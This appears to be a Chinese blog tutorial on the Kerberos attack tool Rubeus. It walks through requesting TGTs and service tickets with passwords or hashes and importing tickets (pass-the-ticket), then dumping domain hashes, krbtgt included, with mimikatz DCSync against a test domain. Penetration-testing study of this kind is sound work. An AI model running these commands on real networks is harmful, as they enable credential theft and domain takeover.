内网安全工具之Rebeus的使用

最新推荐文章于 2024-05-30 16:51:22 发布
最新推荐文章于 2024-05-30 16:51:22 发布
阅读量1.1k 收藏 17
点赞数 33
文章标签: 安全 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45910629/article/details/138976821
版权

Rubeus 是由国外安全研究员@harmj0y 用 C#语言写的一款针对 Kerberos 协 议进行攻击的工具。它在很大程度上改编自@Benjamin Delpy 的 kekeo 工具 和 @Vincent LE TOUX 的 MakeMeEnterpriseAdmin 项目。它可以发起 Kerberos请求,并将请求的票据导入内存中,从而模拟针对 Kerberos 协议各个阶段发起攻击,以方便安全研究员进行研究和学习。Rebeus 提供了大量用于 Kerberos攻击的功能,如TGT认购权证请求、ST 服务票据请求、AS-REP Roasting 攻击、 Kerberoasting 攻击、委派攻击、黄金票据攻击、白银票据攻击等,因此其使用程度远超 Kekeo 工具。以下演示 Rubeus 工具的一些常见的用法。
项目地址:https://github.com/GhostPack/Rubeus
image.png

申请TGT认购权证

Rubeus 使用 asktgt 模块请求 TGT 认购权证,可以使用明文、密码哈希 (DES 加密和 RC4 加密) 和 AES Key(AES128 和 AES256)进行认证;其可以将 TGT 认购权证以 base64 格式打印出来、可以将 TGT 认购权证保存为文件,也可以将 TGT 认购权证直接导入到内存中。
将 TGT 认购权证导入到内存中后,想请求什么服务,系统就会自动利用该 TGT 认购权证请求指定服务的 ST 服务票据。
如当 dir 域控或者 dcsync 哈希的时候,会自动请求对应的 ST 服务票据。
asktgt 模块有以下参数,用[]括住的参数说明是可选参数:

  • /user:USER :请求的用户名
  • </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> :凭据的格 式,有明文密码、des 加密的哈希、NTLM Hash、aes128 和 aes256,以及加密的类型
  • [/domain:DOMAIN] :域名
  • [/dc:DOMAIN_CONTROLLER] :域控
  • [/outfile:FILENAME] :输出的文件
  • [/ptt] :pass the ticket,即将票据导入到内存中
  • [/luid] :该参数用户将生成的票据用于指定的登录会话(需要管理员权限)
  • [/nowrap] :格式更好
  • [/opsec]
  • [/nopac]:票据中不请求 PAC

如果没有指定/domain 参数,则默认使用主机当前所在域。如果没有指定 /dc 参数,则会使用 DsGetDcName 函数来获取主机当前所在域的域控。

明文密码请求

Rebeus 支持使用明文密码请求 TGT 认购权证。如下命令,使用administrator 的明文密码请求 TGT 认购权证。

#明文密码申请 TGT 认购权证,以 base64 格式打印出来并导入到内存中
Rubeus.exe asktgt /user:administrator /password:admin@123 /nowrap /ptt

#明文密码申请 TGT 认购权证,将票据保存为 ticket.kirbi 文件,并导入到内存中
Rubeus.exe asktgt /user:administrator /password:admin@123 /nowrap /ptt /out file:ticket.kirbi

以 administrator 身份申请一张 TGT 认购权证,该 TGT 认购权证 以 base64 格式打印出来并导入到内存中。
image.png
TGT 认购权证导入内存后,即可访问高权限服务了。通过 dir 命令访问域控和通过 mimikatz 的 DCSync 功能导出域内哈希。

mimikatz.exe "lsadump::dcsync /domain:tmac.com /user:krbtgt /csv" "exit"

image.png
image.png
也可以将 TGT认购权证保存为 kirbi 票据文件。以 administrator 身份申请一张 TGT 认购权证,该 TGT 认购权证保存为 kirbi 票据文件并导入到内存中。

Rubeus.exe asktgt /user:administrator /password:admin@123 /nowrap /ptt /outfile:ticket.kirbi

image.png

密码哈希请求

Rubeus 也支持使用密码哈希请求 TGT 认购权证。如下命令,使用administrator 的密码哈希请求 TGT 认购权证。
579DA618CFBFA85247ACF1F800A280A4

#密码哈希申请 TGT 认购权证,以 base64 格式打印出来并导入到内存中
Rubeus.exe asktgt /user:administrator /rc4:579DA618CFBFA85247ACF1F800A280A4 /e nctype:RC4 /nowrap /ptt

#将票据保存为 ticket.kirbi 文件,并导入到内存中,此时不会以 base64 格式打印出来
Rubeus.exe asktgt /user:administrator /rc4:579DA618CFBFA85247ACF1F800A280A4 /e nctype:RC4 /nowrap /ptt /outfile:ticket.kirbi

image.png
TGT 认购权证导入内存后,即可访问高权限服务了。通过 dir 命令访问域控和通过 mimikatz 的 DCSync 功能导出域内哈希。
image.png

请求ST服务票据

Rubeus 使用 asktgs 模块请求 ST 服务票据,需要提供一张 TGT 认购权证, 提供的 TGT 认购权证可以是 base64 格式的也可以是 kirbi 结尾的票据文件。因此,需要先使用 Rubeus 请求一张 TGT 认购权证,然后再使用 asktgs 模块用该 TGT 认购权证请求指定服务的 ST 服务票据。可以将请求的 ST 服务票据以 base64 格式打印出来、可以将 ST 服务票据保存为文件,也可以将 ST 服务票据直接导入到内存中。
asktgs 模块有以下参数,用[]括住的参数说明是可选参数:

  • </ticket:BASE64 | /ticket:FILE.KIRBI> :票据文件
  • /service:SPN1,SPN2,… :请求的服务
  • [/enctype:DES|RC4|AES128|AES256] :加密类型
  • [/dc:DOMAIN_CONTROLLER] :域控
  • [/outfile:FILENAME] :输出的文件
  • [/ptt] :即将票据导入到内存中
  • [/nowrap] :格式更好
  • [/enterprise]
  • [/opsec]
  • </tgs:BASE64 | /tgs:FILE.KIRBI> :指定生成 base64 格式的票据还是票据文件
  • [/usesvcdomain]

请求TGT认购权证

#明文密码申请 TGT 认购权证,以 base64 格式打印出来
Rubeus.exe asktgt /user:"administrator" /password:"admin@123" /domain:"tmac.com" /dc:"WIN-3EAQBB8A70H.tmac.com" /nowrap /ptt

image.png

请求ST服务票据

用上一步请求的 TGT 认购权证即可请求指定服务的 ST 服务票据了,这里需要注意的是我们平常请求的 CIFS 服务的票据,只能用于 dir 这种操作,而不能使用 mimikatz 的 DCSync 功能。要想使用 mimikatz 的 DCSync 功能,需要请求 LDAP 服务。

请求CIFS服务票据

#请求访问 WIN-3EAQBB8A70H.tmac.com 的 cifs 服务的 ST 服务票据,并导入到内存中
Rubeus.exe asktgs /service:"cifs/WIN-3EAQBB8A70H.tmac.com" /nowrap /ptt /ticket:上一步请求的 T GT 票据的 base64 格式

导入后即可访问dir服务

请求LDAP服务票据

用上一步得到的 TGT 认购权证请求 LDAP 服务的 ST 服务票据。

#请求访问  WIN-3EAQBB8A70H.tmac.com 的 ldap 服务的 ST 服务票据,并导入到内存中
Rubeus.exe asktgs /service:"ldap/WIN-3EAQBB8A70H.tmac.com" /nowrap /ptt /ticket:上一步请求的 TGT 票据的 base64 格式

##通过 mimikatz 的 DCSync 功能导出域用户哈希
mimikatz.exe "lsadump::dcsync /domain:tmac.com /user:krbtgt /csv" "exit"

Rubeus导入票据

Rubeus 支持通过票据文件或者 base64 格式的票据进行导入。票据文件除了可以是 Rubeus 请求生成的票据,也可以是其他工具如 Kekeo请求的票据,只要是以.kirbi 为后缀的均可。

导入base64格式的票据

如果在请求票据的时候没有使用/ptt 参数导入到内存中的话,可以直接使用Rubeus 导入请求的 base64 格式票据,即可访问目标。
使用 administrator 凭据请求 TGT 认购权证,以 base64 格式打印出来,不导入到内存中。

Rubeus.exe asktgt /user:administrator /password:admin@123 /nowrap

image.png
然后执行如下命令将以上 base64 格式的票据导入到内存中。

#导入票据
Rubeus.exe ptt /ticket:上一步请求的 TGT 票据

导入票据文件

Rubeus 支持导入以.kirbi 为后缀的票据文件。可以是 Rubeus 生成的票据文件,也可以是其他工具如 Kekeo 生成的票据文件。

导入RUbeus生成的票据

使用 Rubeus 生成票据文件,并使用 Rebeus 导入票据文件

#明文密码申请 TGT 认购权证,将票据保存为 ticket.kirbi 文件,此时并不导入到内存中
Rubeus.exe asktgt /user:administrator /password:admin@123 /nowrap /outfile:ticket.kirbi

#导入票据
Rubeus.exe ptt /ticket:ticket.kirbi

image.png
成功导入票据
image.png

导入kekeo生成的票据

#用 Kekeo 申请 TGT 认购权证,此时会生成一个 kirbi 结尾的票据
Kekeo.exe "tgt::ask /user:administrator /domain:tmac.com /password:admin@123" "exit"

image.png

#导入票据
Rubeus.exe ptt /ticket:TGT_administrator@TMAC.COM_krbtgt~tmac.com@TMAC.COM.kirbi

导入成功
image.png

Tmac自留
关注
  • 33
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
北信源内网安全管理系统_用户使用手册.pdf
08-27
北信源出品
内网综合扫描工具fscan的详细使用
03-27
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、...
新一代kerberos攻击:钻石票据(Diamond Ticket)和蓝宝石票据(Sapphire Ticket)
qq_22792465的博客
10-02 785
PAC在Kerberos认证协议中的作用(一) | Microsoft LearnPAC的全称是Privilege Attribute Certificate(特权属性证书), 其中所包含的是各种授权信息, 例如用户所属的用户组, 用户所具有的权限等。PAC的作用是用来验证用户是否有权限来访问服务,如果没有PAC,那么只需要拿到Hash就可以访问任何服务了,所以加入PAC是为了即使获得了Hash但是也会判断用户是否有权限访问某项服务。PAC 是一种传递域控制器 (DC)提供的授权相关信息的结构。
内网安全:RDP WinRS WinRM SPN Kerberos 横向移动
qq_61553520的博客
01-28 1292
​​​​​​​。
8-域内渗透
WX公众号-小白学安全
02-23 680
服务主体名称(Server Principal Name)SPN,是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务账户进行关联,在域中如果有多个服务,那么每个服务都必须有自己的SPN和用户。一个用户可以有多个SPN,但是一个SPN只能对应一个服务,SPN必须注册在用户下。简述SPN:服务主体名称,将服务用户和服务进行关联服务用户:用于登录运行服务的用户服务:运行在计算机上的服务命令格式两个必须元素:serviceclass为服务类,host为服务所在的主机名字。
cpolar.exe,安全内网穿透工具
12-08
安全内网穿透工具,只需一行命令,就可以将内网站点穿越任意NAT防火墙暴露至公网,方便给客户演示。高效调试微信公众号、小程序、对接支付宝网关等云端服务,提高您的编程效率。
reGeorg内网穿透工具
07-07
reGeorg内网穿透工具
电脑教程开源内网穿透工具 frp 简单使用教程.rar
10-25
电脑教程开源内网穿透工具 frp 简单使用教程
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 996
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
云端数据提取:安全、高效地利用无限资源
Shaidou_Data的博客
05-30 527
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
ModStartBlog v9.4.0 后台安全升级,已知问题修复
qq_26450889的博客
05-29 911
ModStart 是一个基于 Laravel 模块化极速开发框架。模块市场拥有丰富的功能应用,支持后台一键快速安装,让开发者能快的实现业务功能开发。系统完全开源,基于 Apache 2.0 开源协议。
助力矿山智能化建设,中海达推出全新安全管控方案
Hi_Target的博客
05-30 625
针对露天矿边坡、尾矿库、采空区地表沉降等问题,采用北斗高精度定位、地基InSAR、激光雷达等技术,实现大范围全覆盖、多源数据融合、自动化监测、实时预警。采用北斗、UWB/蓝牙、音视频、5G等技术,实现露天矿人员、车辆的全方位实时监控、电子围栏告警、指挥调度,提升矿山安全生产管理水平。2008年进入矿山安全监测领域,至今已有十六年的研发、交付和运维经验,实施案例遍布内蒙古、新疆、西藏、云南、广东、福建等多个省市自治区。涉及井上井下,道路分布复杂、人员车辆密集、车辆载重大,易发生地质灾害和人员安全事故。
Dynamics 365:安全的客户参与应用程序
全网:架构师研究会
05-29 600
客户参与应用程序使用Microsoft Dataverse提供了一个丰富的安全模型,可以适应许多业务场景。本节为您提供了应考虑的安全措施的特定于产品的指导。Dataverse安全模型有以下目标:只允许用户访问他们工作所需的信息。按角色对用户进行分组,并根据这些角色限制访问权限。支持数据共享,以便用户和团队可以访问他们不拥有的记录以进行特定的协作。阻止用户访问他们不拥有或共享的记录。了解有关Mic...
CRLF注入漏洞
LfanBQX的博客
05-27 289
找到输入点【一般在请求头/后】,构造恶意的CRLF字符,添加换行符+cookie,看响应是否出现cookie值和换行。CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a)。验证方法:通过修改HTTP参数或URL,注入恶意的CRLF,查看构造的恶意数据是否在响应头中输出。Nginx会将 $uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。▶ crlfuzz -u "URL" 单个扫描。漏洞存在会显示32m。
德人合科技——天锐绿盾内网安全管理软件 | -文档透明加密模块
m0_74448820的博客
05-30 375
重要的文档从生成即强制加密,强力守护信息资产。在授权环境中,文档能自动解密,不影响用户原有使用习惯;在非授权环境中,加密文档则无法正常打开和使用,严防文档泄露。在加密文档的使用过程中, 能够防止用户通过剪贴板、截屏、打印(虚拟打印)等方式窃取加密文档内容。
FastAPI - 安全(Security)4
最新发布
buyue
05-30 114
【代码】FastAPI - 安全(Security)4。
富格林:谨防被骗实现安全交易
fgl100的博客
05-30 246
富格林指出,进行现货黄金投资的时候,有不少投资者都会犯下这个危及安全交易的毛病,就是没有合理控制好交易成本。如果投资成本没有控制好,把自己账户资金的全部都放进去,那么一旦逆势波动,就可能会发生爆仓的情况。成本和仓位不混为一谈,有些投资者认为成本和仓位是一样的,但并不是的,成本是投资者,投入多少金额的。如果投资的仓位较大,成本也会大,但是成本大,仓位不一定大,同时大仓位带来的收益与风险是并存的。以上的是富格林分享的控制费用成本的实用方法,有助于帮助投资者通过减少支出,从而增加利润。
“AURORA-M:首个遵循人类审查安全指令微调的开源多语言模型
人工智能前沿分享
05-27 862
AURORA-M数据集由一系列精心策划的图像和相应的文本描述组成,这些描述涵盖了广泛的主题和场景。
FCN内网穿透工具使用
07-21
FCN是一款用于内网穿透的工具,它可以帮助用户在公网上访问处于内网环境中的服务或设备。以下是使用FCN内网穿透工具的步骤: 1. 下载和安装FCN:首先,你需要在你的计算机上下载并安装FCN内网穿透工具。你可以从FCN官方网站或者其他可靠的软件下载网站下载安装包,并按照安装向导进行安装。 2. 注册和登录:安装完成后,你需要注册一个FCN账户并登录。创建一个账户是免费的,但是FCN也提供了一些高级功能需要付费。 3. 创建隧道:登录后,你可以打开FCN客户端,并通过界面创建一个隧道。隧道定义了内网服务在公网上的访问方式。你需要提供内网服务的端口号和类型(如HTTP、HTTPS、TCP等),并指定访问该服务的域名或者IP地址。 4. 开启隧道:创建隧道后,你可以点击启动按钮来启动该隧道。FCN会为你分配一个公网地址,用于访问内网服务。 5. 测试访问:启动隧道后,你可以尝试在公网上访问你的内网服务。在浏览器中输入分配的公网地址,并指定相应的端口号和路径,即可访问到你的内网服务。 需要注意的是,使用FCN进行内网穿透可能会涉及到网络安全问题,因此在使用之前请确保你的内网服务已经采取了必要的安全措施,并对FCN的使用进行适当的评估和风险管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值